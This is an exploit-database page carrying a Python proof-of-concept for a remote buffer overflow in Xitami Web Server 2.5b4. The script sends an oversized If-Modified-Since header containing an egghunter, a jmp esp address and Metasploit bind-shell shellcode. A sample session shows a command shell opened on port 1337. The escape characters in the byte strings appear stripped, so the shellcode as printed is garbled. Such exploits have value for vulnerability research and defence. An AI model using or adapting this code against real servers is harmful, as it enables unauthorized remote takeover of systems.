Home / exploits Xitami Web Server 2.5 Buffer Overflow
Posted on 04 June 2011
# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter) # Date: June 4, 2011 # Author: Glafkos Charalambous # Version: 2.5b4 # Tested on: Windows XP SP3 En # Discovered by: Krystian Kloskowski # # root@bt:~/Desktop# python xitami.py 192.168.0.24 80 # [+] Connected # [+] Sending payload... # [+] Check Port 1337 for your shell # root@bt:~/Desktop# telnet 192.168.0.24 1337 # Trying 192.168.0.24... # Connected to 192.168.0.24. # Escape character is '^]'. # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Xitami>ipconfig # ipconfig # # Windows IP Configuration # # # Ethernet adapter Local Area Connection: # # Connection-specific DNS Suffix . : # IP Address. . . . . . . . . . . . : 192.168.0.24 # Subnet Mask . . . . . . . . . . . : 255.255.255.0 # Default Gateway . . . . . . . . . : 192.168.0.1 # # C:Xitami> import time import socket import sys if len(sys.argv) != 3: print "Usage: ./xitami.py <Target IP> <Target Port>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) egghunt = ("x66x81xCAxFFx0Fx42x52x6Ax02" "x58xCDx2Ex3Cx05x5Ax74xEFxB8" "w00t" # 4 byte tag "x8BxFAxAFx75xEAxAFx75xE7xFFxE7") # ./msfpayload windows/shell_bind_tcp lport=1337 exitfunc=process R | ./msfencode -b 'x00x0ax0d' -e x86/shikata_ga_nai -c 7 -t c shellcode = ("xbaxa2xcfxadx8dxdbxd1xd9x74x24xf4x5ex29xc9xb1" "x7ex83xeexfcx31x56x11x03x56x11xe2x57x70xe4x08" "x09x2dx2exd1xecx46xf5x22x56x96x3cx7bx1ex5bx7e" "x78xefx23x71x82x3ex5fxf1xd3x58x3bx53x30xe6xbc" "x82xb3xbaxf5xdfx9ex21x78xcdx8dx25x87x5bxd4xfd" "x6cxcdxcfx7bx68x84x3dx07xcbx1ex1bx06x11x31xfd" "x90x27xffxe6x22x4dxddx1axc9xe1x93x45x4bx13x48" "x74xccx45x07x95xd1x38xdexa3xefx7dx68xb0xd1x67" "x60xe5x89xb5xf7x3ex2fx49xd7xb8xc0xc6x1bxfcxe2" "xbbxc8xaex39x78x81x4dxc4x1cx2dx16x6dxc3x04xde" "x58x43x4exc5x60x46x4bxc9x79xfbx32xddx46xb8xd4" "x61x62x92xf6xe8x7bxe8x41xc0xeexe2xbbx64x6cxb8" "x43x2dxfdxdax61xb0x7cxe6x36xabx3ex7ax80xe6x60" "x2bx52x1dx53xedxb4x94x86x8bx66x26x56x67xe0x7c" "xfbx1cxb9x4fx75x4ex7dx63xacxbcx7ex90xfdxa1xb2" "x6bx06xb4x92x1fx90x26x1ax4fx3dx18xa2x3cx72x0f" "x93x37xf7xf3x5ax7fx33xbfx9fxc2xeaxb9x13x6cx77" "xb6xd4xc0x37x86x78xd3x86x8cx9fx3ax0fxb1x5ex0f" "xb9x09xf1x0cxe9x2fxb7xd7xeax37x4fx6axc3xdbx7b" "x48x32x05xd4x48xccx47x59x41xc5x0bxf5x02xebx06" "x7fxaex25x2bx16x2dx51x18x91x9cx96x32x17x1cx6e" "x95xb9x4exf5xa6x29x8bx30x48x07x55xf1xe4xa8xe2" "x4dxe0x6axefxd3x4ex07x4dxb2x25xe0xb2x33x1bxdc" "x50xacx59x35xd9x91x9cx44x5axc1x52x19x0fx03xc9" "x1dx71xe5x79x54x3dxc0x87x4dx9fx9dx69x09xd4x6b" "xe2xa5xe0x77xd0xb9xbdx85xd0x35xcbx59x78x22xf2" "x25x78x64xf6x2ax8dx3exc8xcex7cx6fx64x24xb4x2c" "x14xd5xffx9cx84x40xf1x74xcfx3cx4fxacx2cxe2xae" "xaaxafxb0xcfxc8x31x30xb3xb0x8bx08x25x2dx95x3d" "xf5x0cx1fx23xd9x87x31x79xd2x8dxadx59xddxb0x4c" "xa4x17xebx97xb0x90x3cx45xb7x3fx2bx04xf3xc6xe8" "x56x25x7axfdx6ex3bxefx64x14x9bx67x08x9cx47x73" "x24x1ex1exc6xd2xadxccx0cxc8xbbx4ex12xdexf5x35" "x25xe0xb0xefx04xb5x29x62xc6x56x44x52x16xa3x63" "x63xcdxd1xc9x45x87x3bxd6x4bx7ax24xd5xd4x7dx4c" "x83x06x16x88x7f") jump = "xebx22" # short jump buf = "A" * 72 buf += "xD7x30x9Dx7C" # jmp esp (user32.dll) / XP SP3 English buf += jump buf += "x90" * 50 buf += egghunt buf += "w00tw00t" # tag buf += shellcode header = ( 'GET / HTTP/1.1 ' 'Host: %s ' 'If-Modified-Since: pwned, %s ' ' ') % (target, buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, port)) print "[+] Connected" except: print "[!] Connection Failed" sys.exit(0) print "[+] Sending payload..." s.send(header) time.sleep(1) s.close() print "[+] Check port 1337 for your shell"
